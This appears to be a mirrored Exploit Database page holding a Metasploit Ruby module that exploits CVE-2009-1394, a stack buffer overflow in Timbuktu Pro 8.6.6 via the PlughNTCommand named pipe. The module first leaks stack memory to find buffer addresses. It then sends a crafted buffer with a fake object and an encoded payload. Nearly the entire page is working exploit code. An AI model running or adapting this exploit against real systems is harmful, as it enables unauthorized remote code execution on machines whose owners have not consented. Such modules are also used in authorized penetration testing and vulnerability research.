Timbuktu 8.6.6 – PlughNTCommand Named Pipe Buffer Overflow (Metasploit)

• Exploit Database
• 132 阅读

• 作者： Metasploit
  日期： 2010-04-30
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16370/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161

  ## # $Id: timbuktu_plughntcommand_bof.rb 9179 2010-04-30 08:40:19Z jduck $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking   include Msf::Exploit::Remote::SMB   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6 in a pretty novel way.   This exploit requires two connections. The first connection is used to leak stack data using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying a large value for this argument it is possible to cause Timbuktu to reply to the initial request with leaked stack data. Using this data allows for reliable exploitation of the buffer overflow vulnerability.   Props to Infamous41d for helping in finding this exploitation path.   The second connection utilizes the data from the data leak to accurately exploit the stack based buffer overflow vulnerability.   TODO: hdm suggested using meterpreter&apos;s migration capability and restarting the process for multishot exploitation. }, &apos;Author&apos; => [ &apos;bannedit&apos; ], &apos;License&apos;=> MSF_LICENSE, &apos;Version&apos;=> &apos;$Revision: 9179 $&apos;, &apos;References&apos; => [ [ &apos;CVE&apos;, &apos;2009-1394&apos; ], [ &apos;OSVDB&apos;, &apos;55436&apos; ], [ &apos;BID&apos;, &apos;35496&apos; ], [ &apos;URL&apos;, &apos;http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809&apos; ], ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;process&apos;, }, &apos;Payload&apos; => { &apos;Space&apos; => 2048, }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos; => [ # we use a memory leak technique to get the return address # tested on Windows XP SP2/SP3 may require a bit more testing [ &apos;Automatic Targeting&apos;, { # ntdll .data (a fairly reliable address) # this address should be relatively stable across platforms/SPs &apos;Writable&apos; => 0x7C97B0B0 + 0x10 - 0xc } ], ], &apos;Privileged&apos; => true, &apos;DisclosureDate&apos; => &apos;Jun 25 2009&apos;, &apos;DefaultTarget&apos; => 0)) end     # we make two connections this code just wraps the process def smb_connection   connect() smb_login()   print_status("Connecting to \\\\#{datastore[&apos;RHOST&apos;]}\\PlughNTCommand named pipe")   pipe = simple.create_pipe(&apos;\\PlughNTCommand&apos;)   fid = pipe.file_id trans2 = simple.client.trans2(0x0007, [fid, 1005].pack(&apos;vv&apos;), &apos;&apos;)   return pipe   end     def mem_leak   pipe = smb_connection()   print_status("Constructing memory leak...")   writable_addr = target[&apos;Writable&apos;]   buf = make_nops(114) buf[0] ="3 " # specifies the command buf[94] = [writable_addr].pack(&apos;V&apos;) # this helps us by pass some checks in the code buf[98] = [writable_addr].pack(&apos;V&apos;) buf[110] = [0x1ff8].pack(&apos;V&apos;) # number of bytes to leak   pipe.write(buf) leaked = pipe.read() leaked << pipe.read()   if (leaked.length < 0x1ff8) print_error("Error: we did not get back the expected amount of bytes. We got #{leaked.length} bytes") pipe.close disconnect return end     offset = 0x1d64 stackaddr = leaked[offset, 4].unpack(&apos;V&apos;)[0] bufaddr = stackaddr - 0xcc8   print_status "Stack address found: stack #{sprintf("0x%x", stackaddr)}buffer #{sprintf("0x%x", bufaddr)}"   print_status("Closing connection...") pipe.close disconnect   return stackaddr, bufaddr   end     def exploit   stackaddr, bufaddr = mem_leak()   if (stackaddr.nil? || bufaddr.nil? ) # just to be on the safe side print_error("Error: memory leak failed") end   pipe = smb_connection()   buf = make_nops(1280) buf[0] ="3 " buf[94] = [bufaddr+272].pack(&apos;V&apos;) # create a fake object buf[99] = "\x00" buf[256] = [bufaddr+256].pack(&apos;V&apos;) buf[260] = [bufaddr+288].pack(&apos;V&apos;) buf[272] = "\x00" buf[512] = payload.encoded   pipe.write(buf)   end   end